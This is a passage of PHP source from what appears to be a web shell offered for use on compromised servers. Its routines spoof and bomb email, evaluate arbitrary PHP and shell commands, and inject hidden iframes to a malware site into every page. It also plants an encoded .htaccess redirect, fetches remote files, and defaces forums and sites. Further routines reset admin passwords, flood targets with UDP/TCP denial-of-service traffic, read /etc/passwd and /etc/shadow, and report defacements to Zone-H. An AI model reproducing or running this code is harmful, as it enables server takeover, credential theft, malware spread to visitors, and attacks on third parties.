2281 {
2282 $times = $_POST['times'];
2283 while($times--)
2284 {
2285 if(isset($_POST['padding']))
2286 {
2287 $fromPadd = rand(0,9999);
2288 $subjectPadd = " -- ID : ".rand(0,9999999);
2289 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
2290
2291 }
2292 $from = "president$fromPadd@whitehouse.gov";
2293 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
2294 {
2295 $error = 1;
2296 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
2297 break;
2298 }
2299 }
2300 if($error != 1)
2301 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
2302 }
2303 }
2304 else if($_POST['mailfunction'] == "massmailing")
2305 {
2306 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
2307 {
2308 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
2309 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
2310 else
2311 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
2312 }
2313 }
2314}
2315else if(isset($_POST['code']))
2316{
2317 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
2318 {
2319 // FIlter Some Chars we dont need
2320 ?><br>
2321 <textarea name="code" class="box" cols="120" rows="10"><?php
2322 $code = str_replace("<?php","",$_POST['code']);
2323 $code = str_replace("<?","",$code);
2324 $code = str_replace("?>","",$code);
2325
2326 // Evaluate PHP CoDE!
2327 htmlspecialchars(eval($code));
2328 ?>
2329 </textarea><?php
2330 }
2331 else if($_POST['code'] != null && $_POST['intext'] == "false")
2332 {
2333 $code = str_replace("<?php","",$_POST['code']);
2334 $code = str_replace("<?","",$code);
2335 $code = str_replace("?>","",$code);
2336
2337 // Evaluate PHP CoDE!
2338 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
2339 }
2340}
2341else if(isset($_GET['infect']))
2342{
2343 $coun = 0;
2344 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
2345 foreach (glob($_GET['path'] . "*.php") as $injectj00)
2346 {
2347 if($injectj00 == __FILE__)
2348 continue;
2349 if($myfile=fopen($injectj00,'a'))
2350 {
2351 fputs($myfile, $str);
2352 fclose($myfile);
2353 $coun = 1;
2354 }
2355 }
2356 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2357 {
2358 if($myfile=fopen($injectj00,'a'))
2359 {
2360 fputs($myfile, $str);
2361 fclose($myfile);
2362 $coun = 1;
2363 }
2364 }
2365 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2366 {
2367 if($myfile=fopen($injectj00,'a'))
2368 {
2369 fputs($myfile, $str);
2370 fclose($myfile);
2371 $coun = 1;
2372 }
2373 }
2374
2375
2376 if($coun == 1)
2377 echo "<center>Done !!!!<center>";
2378 else
2379 echo "<center>Cannot open files !!!!<center>";
2380}
2381else if(isset($_GET['redirect']))
2382{
2383 if($myfile = fopen(".htaccess",'a'))
2384 {
2385 $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
2386 fwrite($myfile, gzuncompress(base64_decode($mal)));
2387 fwrite($myfile, "\n\r");
2388 fclose($myfile);
2389 echo "<center>Done !!!!<center>";
2390 }
2391 else
2392 echo "<center>Cannot open file !!!!<center>";
2393}
2394else if(isset($_GET['malware']))
2395{ ?>
2396 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
2397 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
2398 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
2399 <div id="showmal"></div>
2400 <?php
2401}
2402else if(isset($_GET['codeinsert']))
2403{
2404 if($file1 = fopen(".htaccess",'r'))
2405 {
2406 ?><div id="showcode"></div>
2407 <form method=post>
2408 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
2409 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
2410 </form>
2411 <?php }
2412 else
2413 echo "<center>Cannot Open File!!</center>";
2414}
2415else if(isset($_POST['getcode']))
2416{
2417 if($myfile = fopen(".htaccess",'a'))
2418 {
2419 fwrite($myfile, $_POST['getcode']);
2420 fwrite($myfile, "\n\r");
2421 fclose($myfile);
2422 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
2423 }
2424 else
2425 echo "Permission Denied";
2426}
2427else if(isset($_GET['uploadurl']))
2428{
2429 $functiontype = trim($_GET['functiontype']);
2430 $wurl = trim($_GET['wurl']);
2431 $path = magicboom($_GET['path']);
2432
2433 function remotedownload($cmd,$url)
2434 {
2435 $namafile = basename($url);
2436 switch($cmd)
2437 {
2438 case 'wwget':
2439 execmd(which('wget')." ".$url." -O ".$namafile);
2440 break;
2441 case 'wlynx':
2442 execmd(which('lynx')." -source ".$url." > ".$namafile);
2443 break;
2444 case 'wfread' :
2445 execmd($wurl,$namafile);
2446 break;
2447 case 'wfetch' :
2448 execmd(which('fetch')." -o ".$namafile." -p ".$url);
2449 break;
2450 case 'wlinks' :
2451 execmd(which('links')." -source ".$url." > ".$namafile);
2452 break;
2453 case 'wget' :
2454 execmd(which('GET')." ".$url." > ".$namafile);
2455 break;
2456 case 'wcurl' :
2457 execmd(which('curl')." ".$url." -o ".$namafile);
2458 break;
2459 default:
2460 break;
2461 }
2462 return $namafile;
2463 }
2464 $namafile = remotedownload($functiontype,$wurl);
2465 $fullpath = $path . $directorysperator . $namafile;
2466 if(is_file($fullpath))
2467 {
2468 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
2469 }
2470 else
2471 echo "<center>Failed to upload $namafile</center>";
2472}
2473else if(isset($_GET['createfolder']))
2474{
2475 if(!mkdir($_GET['createfolder']))
2476 echo "Failed To create";
2477 else
2478 echo "<font class=txt>Folder Created Successfully</font>";
2479}
2480else if(isset($_GET['selfkill']))
2481{
2482 if(unlink(__FILE__))
2483 echo "<br><center><font size=5>Good Bye......</font></center>";
2484 else
2485 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
2486}
2487else if(isset($_GET['Create']))
2488{
2489 ?>
2490 <form method="post">
2491 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
2492 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
2493 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
2494 </form>
2495
2496<?php }
2497else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
2498{
2499 $content = $_POST['filecontent'];
2500 if($file_pointer = fopen($_POST['filecreator'], "w+"))
2501 {
2502 fwrite($file_pointer, $content);
2503 fclose($file_pointer);
2504 echo "<font class=txt>File Created Successfully</font>";
2505 }
2506 else
2507 echo "Cannot Create File";
2508}
2509else if(isset($_REQUEST["defaceforum"]))
2510{
2511 ?>
2512 <center><div id="showdeface"></div>
2513 <font color="#FF0000" size="4">Forum Index Changer</font>
2514 <form action="<?php echo $self; ?>" method = "POST">
2515 <input type="hidden" name="forum">
2516 <input type="hidden" name="defaceforum">
2517 <table border = "1" width="60%" style="text-align: center;border-color:#333333;" align="center">
2518 <tr>
2519 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
2520
2521 <td width="50%"><b> Database :</b> <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
2522 <tr><td height="50" width="50%"><b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> </td>
2523 <td><b> Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2524
2525 <tr><td height="50" width="50%">Type :
2526 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
2527 <option value="vb">vbulletin</option>
2528 <option value="mybb">Mybb</option>
2529 <option value="smf">SMF</option>
2530 <option value="ipb">IPB</option>
2531 <option value="wp">Wordpress</option>
2532 <option value="joomla">Joomla</option>
2533 </select></td>
2534 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
2535
2536 </tr>
2537 <tr>
2538 <td height="167" width="50%" colspan=2>
2539 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
2540
2541 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
2542 <label id="wordpres" style="display:none; float:right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="checked"> All</label></p>
2543 </div>
2544
2545 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
2546 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
2547 </td>
2548 </tr>
2549 </table>
2550 </form>
2551 </center>
2552 <?php
2553 }
2554 else if(isset($_GET["passwordchange"]))
2555 {
2556 echo "<center>";
2557 ?>
2558 <div id="showchangepass"></div>
2559 <font color="#FF0000" size="4">Forum Password Changer</font>
2560 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value);return false;">
2561 <table border = "1" width="60%" height="246" style="text-align: center;border-color:#333333;" align="center">
2562 <tr>
2563 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> <b> DataBase :</b> <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> <b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> <b>Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2564 <tr>
2565 <td height="50" width="50%">Type :
2566 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
2567 <option value="vb">vbulletin</option>
2568 <option value="mybb">Mybb</option>
2569 <option value="smf">SMF</option>
2570 <option value="ipb">IPB</option>
2571 <option value="phpbb">PHPBB</option>
2572 <option value="wp">Wordpress</option>
2573 <option value="joomla">Joomla</option>
2574 </select></td>
2575 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
2576 </tr>
2577 <tr>
2578 <td colspan=2 height="100" width="780">
2579
2580 <p align="center"><div id="fid" style="display:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
2581
2582 <div id="joomla" style="display:none;"><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> <b>New Password :</b> <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
2583
2584 <div id="wpress" style="display:none;"><p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"></div>
2585
2586 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
2587 </tr>
2588 </table>
2589 </form>
2590 </center>
2591 <?php
2592}
2593else if(isset($_GET['dosser']))
2594{
2595 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
2596 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
2597 {
2598 $IP=$_GET['ip'];
2599 $port=$_GET['port'];
2600 $executionTime = $_GET['exTime'];
2601 $no0fBytes = $_GET['no0fBytes'];
2602 $data = "";
2603 $timeout = $_GET['timeout'];
2604 $packets = 0;
2605 $counter = $no0fBytes;
2606 $maxTime = time() + $executionTime;;
2607 while($counter--)
2608 {
2609 $data .= "X";
2610 }
2611 $data .= " Dhanush";
2612
2613 while(1)
2614 {
2615 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
2616 if($socket)
2617 {
2618 fwrite($socket , $data);
2619 fclose($socket);
2620 $packets++;
2621 }
2622 if(time() >= $maxTime)
2623 {
2624 break;
2625 }
2626 }
2627 echo "Dos Completed!<br>";
2628 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
2629 echo "Total Number of Packets Sent : " . $packets . "<br />";
2630 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
2631 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
2632 }
2633}
2634else if(isset($_GET['fuzzer']))
2635{
2636 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
2637 {
2638 $IP=$_GET['ip'];
2639 $port=$_GET['port'];
2640 $times = $_GET['exTime'];
2641 $timeout = $_GET['timeout'];
2642 $send = 0;
2643 $ending = "";
2644 $multiplier = $_GET['multiplier'];
2645 $data = "";
2646 $mode="tcp";
2647 $data .= "GET /";
2648 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
2649 if($_GET['type'] == "tcp")
2650 {
2651 $mode = "tcp";
2652 }
2653
2654 while($multiplier--)
2655 {
2656 $data .= urlencode($_GET['no0fBytes']);
2657 }
2658 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
2659 $data .= "by-Dhanush".$ending;
2660 $length = strlen($data);
2661
2662
2663 echo "Sending Data :- <br /> <p align='center'>$data</p>";
2664
2665 for($i=0;$i<$times;$i++)
2666 {
2667 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
2668 if($socket)
2669 {
2670 fwrite($socket , $data , $length );
2671 fclose($socket);
2672 }
2673 }
2674 echo "Fuzzing Completed!<br>";
2675 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
2676 echo "Total Number of Packets Sent : " . $times . "<br />";
2677 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
2678 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
2679 }
2680}
2681else if(isset($_GET['bypassit']))
2682{
2683 if(isset($_GET['copy']))
2684 {
2685 if(@copy($_GET['copy'],"test1.php"))
2686 {
2687 $fh=fopen("test1.php",'r');
2688 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
2689 @fclose($fh);
2690 unlink("test1.php");
2691 }
2692 }
2693 else if(isset($_GET['imap']))
2694 {
2695 $string = $_GET['imap'];
2696 echo "<textarea cols=120 rows=20 class=box readonly>";
2697 $stream = imap_open($string, "", "");
2698 $str = imap_body($stream, 1);
2699 echo "</textarea>";
2700 }
2701 else if(isset($_GET['sql']))
2702 {
2703 echo "<textarea cols=120 rows=20 class=box readonly>";
2704 $file=$_GET['sql'];
2705
2706 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2707 $mysql_files = explode(':', $mysql_files_str);
2708
2709 $sql = array (
2710 "USE $mdb",
2711 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
2712 "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
2713 . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
2714 . "ESCAPED BY '' "
2715 . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
2716
2717 "SELECT a FROM $tbl LIMIT 1"
2718 );
2719 mysql_connect ($mhost, $muser, $mpass);
2720
2721 foreach ($sql as $statement) {
2722 $q = mysql_query ($statement);
2723
2724 if ($q == false) die (
2725 "FAILED: " . $statement . "\n" .
2726 "REASON: " . mysql_error () . "\n"
2727 );
2728
2729 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
2730
2731 echo htmlspecialchars($r[0]);
2732 mysql_free_result ($q);
2733 }
2734 echo "</textarea>";
2735 }
2736 else if(isset($_GET['curl']))
2737 {
2738 $ch=curl_init("file://" . $_GET[curl]);
2739 curl_setopt($ch,CURLOPT_HEADERS,0);
2740 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2741 $file_out=curl_exec($ch);
2742 curl_close($ch);
2743 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
2744 }
2745 else if(isset($_GET['include']))
2746 {
2747 if(file_exists($_GET['include']))
2748 {
2749 echo "<textarea cols=120 rows=20 class=box readonly>";
2750 @include($_GET['include']);
2751 echo "</textarea>";
2752 }
2753 else
2754 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
2755 }
2756 else if(isset($_GET['id']))
2757 {
2758 echo "<textarea cols=120 rows=20 class=box readonly>";
2759 for($uid=0;$uid<60000;$uid++)
2760 { //cat /etc/passwd
2761 $ara = posix_getpwuid($uid);
2762 if (!empty($ara))
2763 {
2764 while (list ($key, $val) = each($ara))
2765 {
2766 print "$val:";
2767 }
2768 print "\n";
2769 }
2770 }
2771 echo "</textarea>";
2772 break;
2773 }
2774 else if(isset($_GET['tempnam']))
2775 {
2776 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
2777 $fp = fopen ( $mytmp, 'r' );
2778 while(!feof($fp))
2779 echo fgets($fp);
2780 fclose ( $fp );
2781 }
2782 else if(isset($_GET['symlnk']))
2783 {
2784 echo "<textarea cols=120 rows=20 class=box readonly>";
2785 @mkdir("mydhanush",0777);
2786 @chdir("mydhanush");
2787 execmd("ln -s /etc/passwd");
2788
2789 echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
2790 echo "</textarea>";
2791 }
2792 if(isset($_GET['newtype']))
2793 {
2794 $filename = $_GET['newtype'];
2795 echo "<textarea cols=120 rows=20 class=box readonly>";
2796 if($_GET['optiontype'] == "xxd")
2797 echo execmd("xxd ".$filename);
2798 else if($_GET['optiontype'] == "rev")
2799 echo execmd("rev ".$filename);
2800 if($_GET['optiontype'] == "tac")
2801 echo execmd("tac ".$filename);
2802 if($_GET['optiontype'] == "more")
2803 echo execmd("more ".$filename);
2804 if($_GET['optiontype'] == "less")
2805 echo execmd("less ".$filename);
2806 echo "</textarea>";
2807 }
2808}
2809// Deface Website
2810else if(isset($_GET['deface']))
2811{
2812 $myfile = fopen($_GET['deface'],'w');
2813 if(fwrite($myfile, base64_decode($ind)))
2814 {fclose($myfile);
2815 echo "Index Defaced Successfully";}
2816 else
2817 echo "Donot have write permission";
2818}
2819else if(isset($_GET['perms']))
2820{
2821?>
2822 <form>
2823 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
2824 <table align="center" border="1" style="width:40%;border-color:#333333;">
2825 <tr>
2826 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
2827 </tr>
2828 <tr>
2829 <td colspan="2" align="center" style="height:60px">
2830 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
2831 </tr>
2832 </table>
2833
2834 </form>
2835 <?php
2836}
2837else if(isset($_GET["chmode"]))
2838{
2839 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
2840 {
2841 $perms = 0;
2842 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
2843 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
2844 if(@chmod($_GET['myfilename'],$perms))
2845 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
2846 else
2847 echo "<center><blink>Cannot Change File Permissions</blink></center>";
2848 }
2849}
2850else if(isset($_GET['rename']))
2851{
2852?>
2853 <form>
2854 <table border="0" cellpadding="3" cellspacing="3">
2855 <tr>
2856 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
2857 </tr>
2858 <tr>
2859 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
2860 </tr>
2861 <tr>
2862 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/></td>
2863 </tr>
2864 </table>
2865 </form>
2866 <?php
2867
2868}
2869else if(isset($_GET['renamemyfile']))
2870{
2871 if(isset($_GET['to']) && isset($_GET['file']))
2872 {
2873 if(!rename($_GET['file'], $_GET['to']))
2874 echo "Cannot Rename File";
2875 else
2876 echo "<font class=txt>File Renamed Successfully</font>";
2877
2878 }
2879}
2880else if(isset($_GET['open']))
2881{
2882 if(is_file($_GET['myfilepath']))
2883 {
2884 $owner = "0/0";
2885 if($os == "Linux")
2886 $owner = getOGid($_GET['myfilepath']);
2887 ?>
2888 <form>
2889 <table style="width:57%;">
2890 <tr align="left">
2891 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
2892 </tr>
2893 <tr>
2894 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
2895 </tr>
2896 </table>
2897 <textarea name="content" rows="15" cols="100" class="box"><?php
2898 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
2899 if($content)
2900 {
2901 echo $content;
2902 }
2903 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2904 {
2905 if(filesize($_GET['myfilepath']) != 0 )
2906 {
2907 fopen($_GET['myfilepath']);
2908 while(!feof())
2909 {
2910 echo htmlspecialchars(fgets($_GET['myfilepath']));
2911 }
2912 }
2913 }
2914
2915 ?>
2916 </textarea><br />
2917 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
2918 </form>
2919 <?php
2920 }
2921 else
2922 echo "File does not exist !!!!";
2923}
2924else if(isset($_POST['file']) && isset($_POST['content']))
2925{
2926 if(file_exists($_POST['file']))
2927 {
2928 $handle = fopen($_POST['file'],"w");
2929 if(fwrite($handle,$_POST['content']))
2930 echo "<font class=txt>File Saved Successfully!</font>";
2931 else
2932 echo "Cannot Write into File";
2933 }
2934 else
2935 {
2936 echo "File Name Specified does not exists!";
2937 }
2938}
2939else if(isset($_POST["SendNowToZoneH"]))
2940{
2941 $hacker = $_POST['defacer'];
2942 $method = $_POST['hackmode'];
2943 $neden = $_POST['reason'];
2944 $site = $_POST['domain'];
2945
2946 if (empty($hacker))
2947 {
2948 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
2949 }
2950 elseif($method == "--------SELECT--------")
2951 {
2952 die("<center><font size=3>[-] You Must Select The Method !</center>");
2953 }
2954 elseif($neden == "--------SELECT--------")
2955 {
2956 die("<center><font size=3>[-] You Must Select The Reason</center>");
2957 }
2958 elseif(empty($site))
2959 {
2960 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
2961 }
2962 // Zone-h Poster
2963 function ZoneH($url, $hacker, $hackmode,$reson, $site )
2964 {
2965 $k = curl_init();
2966 curl_setopt($k, CURLOPT_URL, $url);
2967 curl_setopt($k,CURLOPT_POST,true);
2968 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2969 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2970 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2971 $kubra = curl_exec($k);
2972 curl_close($k);
2973 return $kubra;
2974 }
2975
2976 $i = 0;
2977 $sites = explode("\n", $site);
2978 echo "<pre class=ml1 style='margin-top:5px'>";
2979 while($i < count($sites))
2980 {
2981 if(substr($sites[$i], 0, 4) != "http")
2982 {
2983 $sites[$i] = "http://".$sites[$i];
2984 }
2985 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2986 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
2987 ++$i;
2988 }
2989
2990 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2991}
2992else if(isset($_GET['executemycmd']))
2993{
2994 $comm = $_GET['executemycmd'];
2995 chdir($_GET['executepath']);
2996 echo shell_exec($comm);
2997}
2998// View Passwd file
2999else if(isset($_GET['passwd']))
3000{
3001 $test='';
3002 $tempp= tempnam($test, "cx");
3003 $get = "/etc/passwd";
3004 $name=@posix_getpwuid(@fileowner($get));
3005 $group=@posix_getgrgid(@filegroup($get));
3006 $owner = $name['name']. " / ". $group['name'];
3007 ?>
3008 <table style="width:57%;">
3009 <tr>
3010 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
3011 </tr>
3012 <tr>
3013 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3014 </tr>
3015 </table>
3016 <?php
3017 if(copy("compress.zlib://".$get, $tempp))
3018 {
3019 $fopenzo = fopen($tempp, "r");
3020 $freadz = fread($fopenzo, filesize($tempp));
3021 fclose($fopenzo);
3022 $source = htmlspecialchars($freadz);
3023 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
3024 unlink($tempp);
3025 }
3026 else
3027 {
3028 ?>
3029 <form>
3030 <input type="hidden" name="etcpasswd">
3031 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3032 <tr>
3033 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3034 </tr>
3035 <tr>
3036 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3037 </tr>
3038 <tr>
3039 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
3040 </tr>
3041 </table><br>
3042 </form>
3043 <?php
3044 }
3045}
3046else if(isset($_GET['shadow']))
3047{
3048 $test='';
3049 $tempp= tempnam($test, "cx");
3050 $get = "/etc/shadow";
3051 if(copy("compress.zlib://".$get, $tempp))
3052 {
3053 $fopenzo = fopen($tempp, "r");
3054 $freadz = fread($fopenzo, filesize($tempp));
3055 fclose($fopenzo);
3056 $source = htmlspecialchars($freadz);
3057 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3058 unlink($tempp);
3059 }
3060}
3061else if(isset($_GET['bomb']))
3062{
3063 ?><div id="showmail"></div>
3064 <form>
3065 <table id="margins" style="width:100%;">
3066 <tr>
3067 <td style="width:30%;">To</td>
3068 <td>
3069 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3070 </td>
3071 </tr>
3072 <tr>
3073 <td style="width:30%;">Subject</td>
3074 <td>
3075 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
3076 </td>
3077 </tr>
3078 <tr>
3079 <td style="width:30%;">No. of Times</td>
3080 <td>
3081 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3082 </td>
3083 </tr>
3084 <tr>
3085 <td style="width:30%;">Pad your message (Less spam detection)</td>
3086 <td><input type="checkbox" name="padding"/></td>
3087 </tr>
3088 <tr>
3089 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
3090 </tr>
3091 <tr>
3092 <td rowspan="2">
3093 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
3094 </td>
3095 </tr>
3096 </table>
3097 </form>
3098 <?php
3099}
3100
3101//Mass Mailer
3102else if(isset($_GET['mail']))
3103{
3104 ?><div id="showmail"></div>
3105 <div align="left">
3106 <form>
3107 <table align="left" style="width:100%;">
3108 <tr>
3109 <td style="width:10%;">From</td>
